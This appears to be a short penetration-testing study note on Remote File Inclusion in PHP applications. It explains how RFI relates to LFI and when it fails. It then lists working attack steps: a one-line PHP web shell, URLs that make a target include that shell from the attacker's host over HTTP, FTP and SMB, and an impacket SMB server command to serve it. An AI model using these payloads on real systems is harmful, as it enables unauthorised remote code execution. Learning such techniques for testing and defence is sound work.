Remote File Inclusion (RFI)

The vulnerable function allows the inclusion of remote URLs. This allows two main benefits:
1. Enumerating local-only ports and web applications (i.e. SSRF)
2. Gaining remote code execution by including a malicious script that we host
Almost any Remote File Inclusion vulnerability is also an Local File Inclusion (LFI) vulnerability, as any function that allows including remote URLs usually also allows including local ones
- an LFI may not necessarily be an RFI.
  - The vulnerable function may not allow including remote URLs
  - You may only control a portion of the filename and not the entire protocol wrapper (ex: http://, ftp://, https://).
  - The configuration may prevent RFI altogether, as most modern web servers disable including remote files by default

http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php

 echo '<?php system($_GET["cmd"]); ?>' > shell.php

http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id

 curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'

if a windows web server is being used

impacket-smbserver -smb2support share $(pwd)

http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami

Last updated 1 year ago